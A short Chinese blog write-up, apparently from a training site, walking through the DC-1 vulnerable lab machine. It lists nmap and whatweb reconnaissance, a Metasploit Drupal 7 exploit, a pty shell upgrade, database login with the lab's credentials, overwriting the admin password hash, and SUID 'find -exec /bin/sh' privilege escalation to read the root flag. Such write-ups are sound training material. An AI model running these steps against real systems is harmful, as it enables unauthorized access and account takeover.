入侵靶机DC-1

1.主机发现

namp -sP 10.3.139.0/24

2.指纹收集

whatweb 10.3.139.96

3.目录爆破

4.根据版本查询相应漏洞

根据版本可查出Drupa7.x存在远程代码执行漏洞

5.使用msf进行漏洞利用

DC-1一共有5个flag

flag1

flag2

flag3

需要登录数据库查找

python -c 'import pty;pty.spawn("/bin/bash")'

登录数据库—替换密码

mysql -udbuser -pR0ck3t

show databases;            //查询库

use drupaldb;                 //进入库

show tables;                   //查表

select * from users;        //查users字段内容

更改uid 1 密码

php scripts/password-hash.sh 123.com        //生成密码123.com

mysql -udbuser -pR0ck3t

show databases;            //查询库

use drupaldb;                 //进入库

update users set pass="$S$DsWoJrlrM2TOlo1/2WE9AFvrHzE4cV703wz3tpbBXGxCYwT6iSex" where uid=1;     //修改密码

flag4

flag5

查看find命令是和权限

find test -exec “whoami” \;

使用find命令调用/bin/bash

find test -exec “/bin/sh” \;

cd /root

ls

cat thefinalflag.txt

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值